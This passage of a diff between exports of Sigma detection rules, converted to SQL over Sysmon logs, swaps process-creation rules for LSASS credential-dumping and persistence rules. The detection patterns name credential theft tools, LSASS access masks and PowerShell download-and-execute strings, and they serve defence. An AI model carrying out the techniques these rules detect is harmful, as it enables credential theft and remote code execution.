'\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Unknown" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", - "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "status": "test", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "status": "experimental", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Suspicious Driver Install by pnputil.exe", - "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", "status": "test", - "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", - "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Pnputil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Unlikely, since these tools shouldn't access lsass.exe at all" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND Image LIKE '%\\\\pnputil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", - "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "status": "stable", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1059" + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Use Of The SFTP.EXE Binary As A LOLBIN", - "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "status": "experimental", - "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_sftp.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", - "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" }, { - "title": "Use of VisualUiaVerifyNative.exe", - "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate testing of Microsoft UI parts." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", - "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "status": "test", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "PUA - Sysinternals Tools Execution - Registry", + "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of SysInternals tools. Filter the legitimate paths used in your environnement" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine 